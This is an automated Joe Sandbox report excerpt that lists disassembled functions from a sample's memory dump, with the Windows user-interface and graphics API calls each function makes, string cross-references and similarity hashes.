SelectObject.GDI32(?,?), ref: 0023420A

Strings

, xrefs: 0023403C
, xrefs: 00234064

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ObjectPixel$Select$CompatibleCreateH_prolog3_
String ID: $
API String ID: 1266819874-227171996
Opcode ID: 1a7188d7252f046ae0aba007eaec15891ab8af2cb04b6070f9fab2e91eafdfd7
Instruction ID: 83145c8bbc382ff836ccc821c3dfcf5dcd6740446d172e1a65d6a711a01b44b2
Opcode Fuzzy Hash: 1a7188d7252f046ae0aba007eaec15891ab8af2cb04b6070f9fab2e91eafdfd7
Instruction Fuzzy Hash: 9C7105B0E10219DBDF24EFA4CD84AADBBB5FF14314F2041A9E948AB251DB31AD91DF40

Function 00250446 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 137COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0025044D
GetObjectW.GDI32(00000018,00000018,TR/), ref: 00250469
_memmove.LIBCMT ref: 002504C7

Strings

TR/, xrefs: 00250460, 00250463
, xrefs: 002504B3

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3Object_memmove
String ID: $TR/
API String ID: 107514201-1616536723
Opcode ID: ee54433efd0e1f078a74d358c5b706168b6b4b14f83eae94920723afe85fb5c0
Instruction ID: 7f7cf6bf3e5b454b71c7251e4e5d2060a3e4ac5e6f7c17fbe9f1c1514eb20e96
Opcode Fuzzy Hash: ee54433efd0e1f078a74d358c5b706168b6b4b14f83eae94920723afe85fb5c0
Instruction Fuzzy Hash: 43414871C2011AAFCF15DFA4DC819EEBB75FF54301B50402AE916B62A0EB305E19DFA4

Function 0020F98B Relevance: 19.8, APIs: 13, Instructions: 269windowCOMMON

Download Yara Rule

APIs

GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 0020F9CA
DispatchMessageW.USER32(?), ref: 0020F9DC
PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0020F9EC
GetCapture.USER32 ref: 0020F9F2
SetCapture.USER32(?), ref: 0020F9FF
GetWindowRect.USER32(?,?), ref: 0020FA23
GetCapture.USER32 ref: 0020FA82
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0020FA9D
DispatchMessageW.USER32(?), ref: 0020FAC1
GetScrollPos.USER32(?,00000002), ref: 0020FBD8
RedrawWindow.USER32(?,00000000,00000000,00000581), ref: 0020FBF2

Part of subcall function 001DCD55: ShowWindow.USER32(00000000,?,?,001CC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 001DCD66

ReleaseCapture.USER32 ref: 0020FC7E
IsWindow.USER32(?), ref: 0020FC87

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Message$CaptureWindow$Dispatch$PeekRectRedrawReleaseScrollShow
String ID:
API String ID: 1149966214-0
Opcode ID: 283a7ef15e1720c5246f4ebf8597d01ed34135c9d0d1e02d210dccc7b60feb94
Instruction ID: 3e6f81f43578652080df7cf709086b997608bab44bbab11d3721cadc08641b28
Opcode Fuzzy Hash: 283a7ef15e1720c5246f4ebf8597d01ed34135c9d0d1e02d210dccc7b60feb94
Instruction Fuzzy Hash: 43A17171A5030A9FDB20DFA4CA989BEB7F9BF48300F14443EE54A97692DB70AC51CB50

Function 00219AA2 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 269COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00219ADA
GetWindowRect.USER32(?,00000000), ref: 00219B30
CopyRect.USER32(00000000,?), ref: 00219B48
PtInRect.USER32(?,?,?), ref: 00219C1F
PtInRect.USER32(?,?,?), ref: 00219C4B
PtInRect.USER32(?,?,?), ref: 00219C80
PtInRect.USER32(?,?,?), ref: 00219CA8
PtInRect.USER32(?,?,?), ref: 00219D14
PtInRect.USER32(?,?,?), ref: 00219D42
PtInRect.USER32(?,?,?), ref: 00219D82

Strings

2, xrefs: 00219AE7

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$CopyParentWindow
String ID: 2
API String ID: 642869531-3001879987
Opcode ID: 75267d6bbed8a46e140ecb35a3ef30ad81fb721ad0ac1a50deb4a4fb9fe65bec
Instruction ID: d710cf0f1b89b7ffb1da7e3ca07a41575530cc6475e8b28b7de6c6c92286ae65
Opcode Fuzzy Hash: 75267d6bbed8a46e140ecb35a3ef30ad81fb721ad0ac1a50deb4a4fb9fe65bec
Instruction Fuzzy Hash: 49B10271E1021A9FCF11DFA8D990AEEBBF8EF58344F14412AE845E7210E7719A90CF90

Function 00212C91 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00212CFA
MonitorFromPoint.USER32(?,?,00000002), ref: 00212D33
GetMonitorInfoW.USER32(00000000), ref: 00212D3A
CopyRect.USER32(?,?), ref: 00212D52
CopyRect.USER32(?,?), ref: 00212D5C

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00212D93
GetSystemMetrics.USER32(00000022), ref: 00212E11
GetSystemMetrics.USER32(00000023), ref: 00212E18

Strings

(, xrefs: 00212D2C
"9!, xrefs: 00212DA3
"9!, xrefs: 00212CA5

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: RectSystem$CopyInfoMetricsMonitor$Exception@8FromH_prolog3ParametersPointThrowWindow
String ID: "9!$"9!$(
API String ID: 348238172-4002098449
Opcode ID: 3c91acd935f1f30616cca6fbcff11fe1a0207aaa383a291388069f122834244c
Instruction ID: f93a477323ac821129466dc1213733ae567a4a15cface4dfa31623b81c701e6d
Opcode Fuzzy Hash: 3c91acd935f1f30616cca6fbcff11fe1a0207aaa383a291388069f122834244c
Instruction Fuzzy Hash: 3151F6B1D002099FCB14DFA9D985AEEBBF9FF98300F14456AE905E7214DB30AA55CF60

Function 00236E1F Relevance: 18.3, APIs: 12, Instructions: 318windowCOMMON

Download Yara Rule

APIs

IsRectEmpty.USER32(?), ref: 00236E40
IsRectEmpty.USER32(?), ref: 00236E6C
IntersectRect.USER32(?,?,?), ref: 00236EEB
IntersectRect.USER32(?,?,?), ref: 00236F87
IsRectEmpty.USER32(?), ref: 00236FC5
IsRectEmpty.USER32(?), ref: 00236FD3
SelectObject.GDI32(?), ref: 00236FE9
IsRectEmpty.USER32(?), ref: 00237002
IsRectEmpty.USER32(?), ref: 0023701A
StretchBlt.GDI32(00000000,?,?,?,?,?,?,?,?,00CC0020), ref: 002370BF
SelectObject.GDI32(?), ref: 002370D0
SetRectEmpty.USER32(?), ref: 0023714B

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$IntersectObjectSelect$Stretch
String ID:
API String ID: 401711590-0
Opcode ID: 31d0103111f753fd4d5092799ee12cd3c725cdbd10ab01802ce8c3920e28e378
Instruction ID: 75ab3fdc6e57b9f8ec6dca49aa9e24177c6c5bd384cfa26df98ffdbca32f91af
Opcode Fuzzy Hash: 31d0103111f753fd4d5092799ee12cd3c725cdbd10ab01802ce8c3920e28e378
Instruction Fuzzy Hash: BAC1D3B291010AAFCF15CFA8D9849EEBBB9BF48354F158219F815E7214DB30E955CFA0

Function 002361BD Relevance: 18.2, APIs: 12, Instructions: 226windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002361C4
TransparentBlt.MSIMG32(00000000,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,000000FF,00000048,00236DED,00000000,?,?), ref: 0023621C
CreateCompatibleDC.GDI32(?), ref: 00236261
CreateCompatibleDC.GDI32(?), ref: 0023627E
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0023629C
StretchBlt.GDI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00236300
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00CC0020), ref: 0023632E
CreateBitmap.GDI32(00000000,00000000,00000001,00000001,00000000), ref: 0023633B
BitBlt.GDI32(001F80B9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CC0020), ref: 00236374
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,001F80B9,00000000,00000000,008800C6), ref: 002363A2
BitBlt.GDI32(?,?,00000000,00000000,00000000,001F80B9,00000000,00000000,008800C6), ref: 002363CF
BitBlt.GDI32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00EE0086), ref: 002363EA

Part of subcall function 001CDC8F: __EH_prolog3_catch_GS.LIBCMT ref: 001CDC99

Part of subcall function 001D0389: DeleteDC.GDI32(00000000), ref: 001D039B

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Create$Compatible$Bitmap$DeleteH_prolog3H_prolog3_catch_StretchTransparent
String ID:
API String ID: 650092443-0
Opcode ID: 2238a3f09a82ced5109985eea5925bcd74e45d469156c289cfe1c6262ae7447c
Instruction ID: 5f8f762bb0bf7cdb2407d4e27842f9f12a1ea87bde20d7cbd35f5444bcca8b71
Opcode Fuzzy Hash: 2238a3f09a82ced5109985eea5925bcd74e45d469156c289cfe1c6262ae7447c
Instruction Fuzzy Hash: E891EE7181015ABFCF02EF90CD85EEEBB7ABF28344F244129F51566261C7319E25EB60

Function 0021C992 Relevance: 18.2, APIs: 12, Instructions: 150windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0021C61A: LoadCursorW.USER32(00000000,00007F8B), ref: 0021C63B
Part of subcall function 0021C61A: LoadCursorW.USER32(?,00007901), ref: 0021C654

PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 0021C9CA
PostMessageW.USER32(?,00000111,0000E145,00000000), ref: 0021CA2D
SendMessageW.USER32(?,00000362,0000E002,00000000), ref: 0021CA4F
GetCursorPos.USER32(?), ref: 0021CA6A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0021CA96
ReleaseCapture.USER32 ref: 0021CAE3
SetCapture.USER32(?), ref: 0021CAE8
ReleaseCapture.USER32 ref: 0021CAF4
SendMessageW.USER32(?,00000362,?,00000000), ref: 0021CB08
SendMessageW.USER32(?,00000111,0000E147,00000000), ref: 0021CB33
PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 0021CB51

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Message$CaptureCursorSend$LoadPeekPostRelease
String ID:
API String ID: 291007519-0
Opcode ID: e663a904ffb5435f9b7937b24c319708423d9c8f3fba4c0204d701a6e712b11e
Instruction ID: 5f849cfa2dc190c3fd7da30d014dbd7a7b6b1aa02b903cc830232395e93cad4e
Opcode Fuzzy Hash: e663a904ffb5435f9b7937b24c319708423d9c8f3fba4c0204d701a6e712b11e
Instruction Fuzzy Hash: 57515C75690209AFDB119FA0DC89AEEBBF9FF54344F204469E286E71A0DB709D90DF10

Function 001FF1BE Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 286keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 001FF1DC
GetWindowRect.USER32(?,?), ref: 001FF244
GetCursorPos.USER32(?), ref: 001FF28E

Strings

2, xrefs: 001FF268

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CursorRectStateWindow
String ID: 2
API String ID: 3412758350-3001879987
Opcode ID: 7dcc2244be62c7b442f7386a601c0b95f8d966e9a03ca348251417d3deb016c3
Instruction ID: 11dca5e585655a015ab276e15094257e568520502cf4ff24692138085ada59ee
Opcode Fuzzy Hash: 7dcc2244be62c7b442f7386a601c0b95f8d966e9a03ca348251417d3deb016c3
Instruction Fuzzy Hash: BCB1F475A00209EFCB24EFA5D885AEEBBF5BF48304F24447EE646A7251DB709941CF21

Function 00221057 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 199windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00221061
GetSystemMenu.USER32(?,00000000,00000214,001E3060,00000000,00000000,00000001,?), ref: 002210C3
IsMenu.USER32(?), ref: 002210DC
IsMenu.USER32(?), ref: 002210F6
SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 0022112B
GetClassLongW.USER32(?,000000DE), ref: 00221141
GetWindowLongW.USER32(?,000000F0), ref: 0022118C

Strings

0, xrefs: 00221269

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Long$ClassH_prolog3_MessageSendSystemWindow
String ID: 0
API String ID: 859179710-4108050209
Opcode ID: 5a4bd4e0728a776111a92fc7228af571539e8cdc7b9f70b4001a37e4ddfce05a
Instruction ID: 49bb96c67fd0b1845507cdef6f14c0f1a7739b8f8c1890e0fde2256f2c7eef92
Opcode Fuzzy Hash: 5a4bd4e0728a776111a92fc7228af571539e8cdc7b9f70b4001a37e4ddfce05a
Instruction Fuzzy Hash: D1818230510666EFDB21DF64DC88FAEB7B4FF54300F2446AAE89A96191DB705A61CF40

Function 00219521 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00219550
MonitorFromPoint.USER32(?,?,00000002), ref: 00219582
GetMonitorInfoW.USER32(00000000), ref: 00219589
CopyRect.USER32(001FB155,?), ref: 0021959B
SystemParametersInfoW.USER32(00000030,00000000,001FB155,00000000), ref: 002195AB
OffsetRect.USER32(?,001FB155,00000000), ref: 002195D5
OffsetRect.USER32(?,?,00000000), ref: 00219600
OffsetRect.USER32(?,00000000,00000000), ref: 0021962D
OffsetRect.USER32(?,00000000,?), ref: 00219652

Strings

(, xrefs: 0021957B

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Offset$InfoMonitor$CopyCursorFromParametersPointSystem
String ID: (
API String ID: 4030222242-3887548279
Opcode ID: 818a5d9fd1641afb1da6f9db94eb86983d5b79c9a47e2dc972b7b3ee5710d2ce
Instruction ID: ab8f56beacf005bde0a98e815fb0b14c008b9653f762547454129768deefb9fc
Opcode Fuzzy Hash: 818a5d9fd1641afb1da6f9db94eb86983d5b79c9a47e2dc972b7b3ee5710d2ce
Instruction Fuzzy Hash: 8141F971A10209EFDB14CFA9D9D49EEF7FAFF58300F648129E505A7240DB70AD868B60

Function 001CD6C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 78COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001CD6E4

Strings

DWrite.dll, xrefs: 001CD750
D2D1.dll, xrefs: 001CD6F9
D2D1MakeRotateMatrix, xrefs: 001CD743
DWriteCreateFactory, xrefs: 001CD769
D2D1CreateFactory, xrefs: 001CD719

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Initialize
String ID: D2D1.dll$D2D1CreateFactory$D2D1MakeRotateMatrix$DWrite.dll$DWriteCreateFactory
API String ID: 2538663250-1403614551
Opcode ID: 5982357fe674153f7acbdf4c9247e2368e881e99d546668a220b4d2b321b94da
Instruction ID: 174bbd28eebe1f89f6732e8832c8f24eba7078bf689ed0b8faebdaba3aaa1eca
Opcode Fuzzy Hash: 5982357fe674153f7acbdf4c9247e2368e881e99d546668a220b4d2b321b94da
Instruction Fuzzy Hash: E011E7717C4344BA87165F6ABCC5EA6BB58DBA1B18B10453EF01AE1150DBB0D990CA50

Function 001DFDFC Relevance: 16.8, APIs: 11, Instructions: 269COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001DFE9A
GetParent.USER32(?), ref: 001DFEA7
IsZoomed.USER32(?), ref: 001DFF0B
SetWindowRgn.USER32(?,00000000,00000001), ref: 001DFF6A
GetClientRect.USER32(?,?), ref: 001DFF92
GetClientRect.USER32(?,?), ref: 001DFFA7

Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D016D
Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D017A

GetWindowRect.USER32(?,?), ref: 001DFFC7

Part of subcall function 001DCDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,001D8A00,?,001D8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 001DCE0F

SetWindowRgn.USER32(?,00000000,00000001), ref: 001E0152

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ClientRect$Screen$ParentZoomed
String ID:
API String ID: 2314217310-0
Opcode ID: 980337a443d610e0200179f1fc48b1c9d977e12a41341a4b28298efac182a6ec
Instruction ID: 5d9a5561315f108cbfe0365b6b85cd89d6534149ff7856420e160b0ff50e997d
Opcode Fuzzy Hash: 980337a443d610e0200179f1fc48b1c9d977e12a41341a4b28298efac182a6ec
Instruction Fuzzy Hash: 0AB12D7190021A9FCF15DFA5C984AEEBBB9FF48700F15017AF905AB256DB709A41CFA0

Function 0021018C Relevance: 16.7, APIs: 11, Instructions: 192timeCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 002101BF
ScreenToClient.USER32(?,?), ref: 002101CC
PtInRect.USER32(?,?,?), ref: 002101FA
PtInRect.USER32(?,?,?), ref: 0021021F
KillTimer.USER32(?,00000002), ref: 0021024F
InvalidateRect.USER32(?,?,00000001), ref: 0021026D
InvalidateRect.USER32(?,?,00000001), ref: 0021027B
_clock.LIBCMT ref: 00210290
KillTimer.USER32(?,00000001), ref: 00210395
ValidateRect.USER32(?,00000000), ref: 002103B1
RedrawWindow.USER32(?,00000000,00000000,00000185,00000000), ref: 002103EF

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
